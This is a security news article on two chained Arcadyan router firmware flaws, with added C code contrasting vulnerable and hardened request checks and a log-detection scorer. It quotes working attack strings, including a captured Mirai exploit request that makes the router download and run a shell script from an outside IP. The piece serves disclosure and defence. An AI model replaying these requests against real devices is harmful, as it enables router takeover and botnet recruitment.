Vulnerability in routers affecting 17 manufacturers

A large-scale network attack has been recorded against routers whose firmware uses the HTTP server implementation from Arcadyan. To take control of a device, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a fairly wide range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the brands of Beeline (the problem is confirmed in the Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. The flaw has been present in Arcadyan firmware for more than 10 years and over that time has made its way into at least 20 device models from 17 different manufacturers.

The first vulnerability, CVE-2021-20090, makes it possible to reach any script of the web interface without authentication. The core of the flaw is that some directories of the web interface, from which images, CSS files and JavaScript are served, are accessible without authentication, and whether a request falls into such a directory is decided by matching a prefix of the request path. The firmware blocks the literal "../" sequence, which would otherwise allow walking up into parent directories, but the percent-encoded combination "..%2f" is not caught by that filter and is only decoded afterwards. As a result, protected pages can be opened with a request such as "http://192.168.1.1/images/..%2findex.htm".
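The following C model is an added illustration and not Arcadyan's code (the article does not show the firmware's internals). It contrasts a prefix check made on the raw, still-encoded request path, which the "..%2f" trick defeats, with one made after percent-decoding and canonicalising the path. The whitelist of public directories and the buffer sizes are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Directories served without authentication (assumed list, for illustration). */
static const char *PUBLIC_PREFIXES[] = { "/images/", "/css/", "/js/", NULL };

static bool has_public_prefix(const char *path)
{
    for (int i = 0; PUBLIC_PREFIXES[i] != NULL; i++)
        if (strncmp(path, PUBLIC_PREFIXES[i], strlen(PUBLIC_PREFIXES[i])) == 0)
            return true;
    return false;
}

/* Model of the flawed check: it inspects the raw request path, rejects a literal
 * "../", then tests the prefix. "..%2f" contains no literal "../" and the path
 * still starts with "/images/", so the traversal is accepted. */
bool vulnerable_is_public(const char *raw_path)
{
    if (strstr(raw_path, "../") != NULL)
        return false;
    return has_public_prefix(raw_path);
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode `in` into `out`; rejects malformed escapes and an encoded NUL. */
bool url_decode(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (o + 1 >= n)
            return false;
        if (in[i] == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (lo < 0 || (hi == 0 && lo == 0))
                return false;
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return true;
}

/* Collapse "." and ".." segments; fail if ".." would climb above the web root. */
bool normalize_path(const char *in, char *out, size_t n)
{
    const char *segs[64];
    size_t lens[64];
    int depth = 0;
    if (in[0] != '/')
        return false;
    for (const char *p = in + 1; ; ) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0)
                return false;              /* escape attempt above "/" */
            depth--;
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            if (depth >= 64)
                return false;
            segs[depth] = p; lens[depth] = len; depth++;
        }
        if (end == NULL)
            break;
        p = end + 1;
    }
    size_t pos = 0;
    if (n < 2)
        return false;
    out[pos++] = '/';
    for (int i = 0; i < depth; i++) {
        if (pos + lens[i] + 2 > n)
            return false;
        memcpy(out + pos, segs[i], lens[i]);
        pos += lens[i];
        if (i + 1 < depth)
            out[pos++] = '/';
    }
    out[pos] = '\0';
    return true;
}

/* Hardened check: decode, canonicalise, and only then compare prefixes, so the
 * decision is made on the same path the file-serving code will actually open. */
bool hardened_is_public(const char *raw_path)
{
    char decoded[512], canon[512];
    if (!url_decode(raw_path, decoded, sizeof decoded))
        return false;
    if (!normalize_path(decoded, canon, sizeof canon))
        return false;
    return has_public_prefix(canon);
}

int main(void)
{
    const char *probes[] = { "/images/logo.png", "/images/../index.htm",
                             "/images/..%2findex.htm", "/images/..%2fapply_abstract.cgi" };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-34s vulnerable=%d hardened=%d\n", probes[i],
               vulnerable_is_public(probes[i]), hardened_is_public(probes[i]));
    return 0;
}
```

One caveat the model makes visible: the decision must be taken on the path in exactly the form the file-serving layer uses. If that layer decodes a second time, a double-encoded "..%252f" would pass the hardened check above and still traverse, so decode once, canonicalise once, and serve from the canonical string.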

The second vulnerability, CVE-2021-20091, lets an authenticated user change the device's system settings by sending specially crafted parameters to the apply_abstract.cgi script, which does not check parameter values for newline characters. For example, when running a ping, an attacker can supply the value "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in the field for the address to be checked; when the script generates the settings file /tmp/etc/config/.glbcfg, it writes the line "ARC_SYS_TelnetdEnable=1" into it, which activates the telnetd server and gives unrestricted shell access with root privileges. In the same way, by setting the ARC_SYS_ parameter, arbitrary code can be executed on the system. The first vulnerability makes it possible to invoke this problematic script without authentication by requesting it as "/images/..%2fapply_abstract.cgi".
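As an added illustration (not the Arcadyan implementation, which the article does not reproduce), the C model below shows how a ping target that still contains the decoded "%0A" turns into an extra "key=value" line in the generated configuration, and how a strict IPv4 check on that field closes the hole. The key names come from the article and the captured exploit; the layout of .glbcfg and the writer itself are assumptions.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Model of the settings writer. The value arrives already URL-decoded, so "%0A"
 * is a real '\n' here. Copying it verbatim yields a second, attacker-chosen line. */
int vulnerable_write_ping_config(const char *target_ip, char *cfg, size_t n)
{
    return snprintf(cfg, n, "ARC_ping_ipaddress=%s\nARC_ping_status=0\n", target_ip);
}

/* Strict dotted-quad check: exactly four decimal octets 0..255 and nothing else. */
bool is_ipv4_literal(const char *s)
{
    int octets = 0;
    while (*s != '\0') {
        int v = 0, digits = 0;
        if (!isdigit((unsigned char)*s))
            return false;
        while (isdigit((unsigned char)*s)) {
            v = v * 10 + (*s++ - '0');
            if (++digits > 3)
                return false;
        }
        if (v > 255)
            return false;
        octets++;
        if (*s == '.') {
            if (*++s == '\0')
                return false;      /* trailing dot */
        } else if (*s != '\0') {
            return false;          /* '\n', '=', letters, ... */
        }
    }
    return octets == 4;
}

/* Hardened writer: the field is an IP address, so accept only an IP address.
 * That also rules out CR/LF and therefore any injected line. Returns -1 on reject. */
int hardened_write_ping_config(const char *target_ip, char *cfg, size_t n)
{
    if (strpbrk(target_ip, "\r\n") != NULL || !is_ipv4_literal(target_ip))
        return -1;
    return snprintf(cfg, n, "ARC_ping_ipaddress=%s\nARC_ping_status=0\n", target_ip);
}

/* Reads "key=value" lines the way a daemon consuming the config would; an injected
 * line is indistinguishable from a legitimate one. */
bool config_get(const char *cfg, const char *key, char *val, size_t n)
{
    size_t klen = strlen(key);
    for (const char *line = cfg; *line != '\0'; ) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len > klen && strncmp(line, key, klen) == 0 && line[klen] == '=') {
            size_t vlen = len - klen - 1;
            if (vlen >= n)
                vlen = n - 1;
            memcpy(val, line + klen + 1, vlen);
            val[vlen] = '\0';
            return true;
        }
        if (eol == NULL)
            break;
        line = eol + 1;
    }
    return false;
}

bool telnetd_enabled(const char *cfg)
{
    char v[8];
    return config_get(cfg, "ARC_SYS_TelnetdEnable", v, sizeof v) && strcmp(v, "1") == 0;
}

/* Run one writer on a submitted value and report whether telnetd ends up enabled. */
bool writer_enables_telnetd(int (*writer)(const char *, char *, size_t), const char *value)
{
    char cfg[256];
    if (writer(value, cfg, sizeof cfg) < 0)
        return false;
    return telnetd_enabled(cfg);
}

int main(void)
{
    /* Constructed payload: the article's example after the server decoded "%0A". */
    const char *evil = "192.168.1.2\nARC_SYS_TelnetdEnable=1";
    printf("vulnerable writer enables telnetd: %d\n",
           writer_enables_telnetd(vulnerable_write_ping_config, evil));
    printf("hardened writer enables telnetd:   %d\n",
           writer_enables_telnetd(hardened_write_ping_config, evil));
    return 0;
}
```

The same positive validation belongs on every parameter the script persists, not just the ping target: the article notes that the ARC_SYS_ parameter alone is enough to run commands, so rejecting newlines in one field while copying others verbatim leaves the bug in place.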

To exploit the vulnerabilities, the attacker must be able to send a request to the network port on which the web interface runs. Judging by how quickly the attack has spread, many operators leave access to their devices open from the external network to simplify diagnostics by their support service. If the interface is reachable only from the internal network, the attack can still be carried out from outside using the "DNS rebinding" technique. The vulnerabilities are already being actively exploited to enlist routers into the Mirai botnet:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.72%0AARC_SYS_TelnetdEnable=1&ARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;chmod+777+lolol.sh;sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
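For anyone who wants to spot this traffic in web-server or proxy logs, the following is an added detection example, not part of the article and not a vendor signature. It scores a request line and body against the indicators visible in the captured exploit above: an encoded "../" in the path, the apply_abstract.cgi target, and a "%0A" followed by an ARC_SYS_ key in the body. The weights and threshold are assumptions to tune against real traffic; the sample requests are constructed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive substring test (strcasestr is not portable C), so that
 * "..%2F" and "%0a" are caught as well as the lowercase/uppercase forms seen. */
static bool ci_contains(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay != '\0'; hay++) {
        size_t i = 0;
        while (i < n && hay[i] != '\0' &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return true;
    }
    return false;
}

/* Scores one HTTP request. Weights are assumptions for illustration. */
int arcadyan_exploit_score(const char *request_line, const char *body)
{
    int score = 0;
    if (ci_contains(request_line, "..%2f"))                       /* CVE-2021-20090 bypass */
        score += 2;
    if (ci_contains(request_line, "apply_abstract.cgi"))          /* the targeted script */
        score += 1;
    if (ci_contains(body, "%0a") && ci_contains(body, "ARC_SYS_")) /* CVE-2021-20091 newline injection */
        score += 2;
    if (ci_contains(body, "ARC_SYS_TelnetdEnable=1"))             /* telnetd switch-on */
        score += 1;
    return score;
}

/* A bare "..%2f" in the path, or a newline into an ARC_SYS_ key, is enough to flag. */
bool is_arcadyan_exploit_attempt(const char *request_line, const char *body)
{
    return arcadyan_exploit_score(request_line, body) >= 2;
}

int main(void)
{
    /* Constructed samples: the in-the-wild shape, a benign asset fetch, and a bare scan. */
    struct { const char *line; const char *body; } samples[] = {
        { "POST /images/..%2fapply_abstract.cgi HTTP/1.1",
          "action=start_ping&ARC_ping_ipaddress=1.2.3.4%0AARC_SYS_TelnetdEnable=1&ARC_SYS_=cd+/tmp" },
        { "GET /images/logo.png HTTP/1.1", "" },
        { "GET /images/..%2Findex.htm HTTP/1.1", "" },
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("score=%d flagged=%d  %s\n",
               arcadyan_exploit_score(samples[i].line, samples[i].body),
               is_arcadyan_exploit_attempt(samples[i].line, samples[i].body), samples[i].line);
    return 0;
}
```

Because the traversal part works against any path under the unauthenticated directories, the "..%2f" indicator alone is worth alerting on even when the body is empty: that is what a scanner probing for index.htm, as in the article's first example, looks like.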

Source: opennet.ru
